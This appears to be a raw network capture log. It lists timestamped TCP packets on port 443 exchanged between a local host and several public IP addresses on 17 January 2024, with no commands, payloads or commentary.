                                                                                                                                                              Jan 17, 2024 17:39:03.088721037 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.088784933 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.099473000 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.099500895 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.099571943 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.099580050 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.099637032 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.108103991 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.108123064 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.108171940 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.108179092 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.108237982 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.161024094 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.161057949 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.161108017 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.161119938 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.161192894 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.170037031 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.170062065 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.170160055 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.170171022 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.170217991 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.177582979 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.177612066 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.177654982 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.177666903 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.177712917 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.181061029 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.181129932 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.181133986 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.181144953 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.181191921 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.190593004 CET49744443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:03.190606117 CET44349744151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.230792046 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.231091976 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.231122971 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.231651068 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.231988907 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.232064962 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.232148886 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.273910999 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.284533978 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.284579039 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.284652948 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.285021067 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.287307024 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.287323952 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469227076 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469274044 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469310045 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469346046 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469363928 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469374895 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469388962 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469415903 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469430923 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469439030 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469468117 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469788074 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469821930 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469841957 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469855070 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469872952 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469907045 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469935894 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469961882 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.469979048 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.469985008 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470021963 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.470654011 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470696926 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470716000 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.470725060 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470751047 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470793962 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.470802069 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.470905066 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.471251011 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471318960 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471348047 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471390963 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.471394062 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471409082 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471451044 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.471457005 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.471497059 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.472078085 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.472172022 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.472323895 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.472472906 CET49745443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:03.472490072 CET44349745104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.474282026 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.474368095 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.477293015 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.477303982 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.477552891 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.521311998 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.597273111 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.641915083 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.687678099 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.687748909 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.687822104 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.829057932 CET49746443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.829106092 CET4434974623.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.922369957 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.922405958 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.922472000 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.925086975 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:03.925101995 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.927026987 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:03.927073956 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.927149057 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:03.927906990 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:03.927922010 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.108840942 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.108943939 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.109324932 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.110285044 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.110308886 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.111243010 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.111304998 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.113101006 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.113171101 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.113698959 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.113708019 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.114701986 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.114720106 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.114969015 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.117150068 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.153992891 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.157931089 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.285604954 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.285799980 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.285855055 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.289680958 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.289696932 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.289709091 CET49747443192.168.2.423.51.58.94
                                                                                                                                                              Jan 17, 2024 17:39:04.289714098 CET4434974723.51.58.94192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345808029 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345860004 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345901012 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345920086 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.345927954 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345952034 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.345968008 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.345998049 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346025944 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346049070 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346065998 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.346072912 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346095085 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.346247911 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346272945 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346287012 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.346292019 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346338987 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.346344948 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346404076 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.346467018 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.346472025 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347182989 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347207069 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347223043 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.347229004 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347273111 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.347279072 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347313881 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347374916 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.347381115 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347934008 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.347980976 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.347986937 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348023891 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348054886 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348062038 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.348067999 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348103046 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.348110914 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348742008 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348815918 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348841906 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348858118 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.348865986 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.348890066 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.349251032 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349294901 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349334955 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.349342108 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349371910 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349400043 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349419117 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.349425077 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.349447012 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.350099087 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.350141048 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.350148916 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.350174904 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.350217104 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.350224972 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.350997925 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.351047039 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.351052999 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.404736042 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.433768988 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.433780909 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.433856964 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.433876991 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.433928967 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.434156895 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434222937 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.434614897 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434667110 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434674978 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.434680939 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434712887 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.434717894 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434761047 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.434808016 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.435741901 CET49748443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.435753107 CET44349748104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.458179951 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.458211899 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.458276033 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.458719969 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.458730936 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.459834099 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.459867954 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.459966898 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.460490942 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.460505009 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.639206886 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.640472889 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.640481949 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.640985966 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.642146111 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.642168045 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.642247915 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.642513990 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.642535925 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.642863035 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.642993927 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.643404007 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.643462896 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.643959999 CET49750443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.689904928 CET44349750104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.689919949 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868592024 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868649006 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868683100 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868731022 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868738890 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.868753910 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868777037 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.868854046 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.868896961 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.868902922 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869075060 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869136095 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.869141102 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869462967 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869577885 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.869581938 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869652033 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869683981 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869728088 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.869734049 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.869776964 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.871599913 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871680021 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871720076 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871731997 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.871741056 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871784925 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.871789932 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871830940 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.871974945 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.871978998 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872019053 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872065067 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872112989 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872114897 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872128010 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872159004 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872334003 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872385025 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872411966 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872427940 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872453928 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872469902 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872481108 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872486115 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872545004 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872550011 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872597933 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872621059 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872833014 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872869968 CET44349749104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.872906923 CET49749443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:04.872910976 CET44349749104.17.2.184192.168.2.4
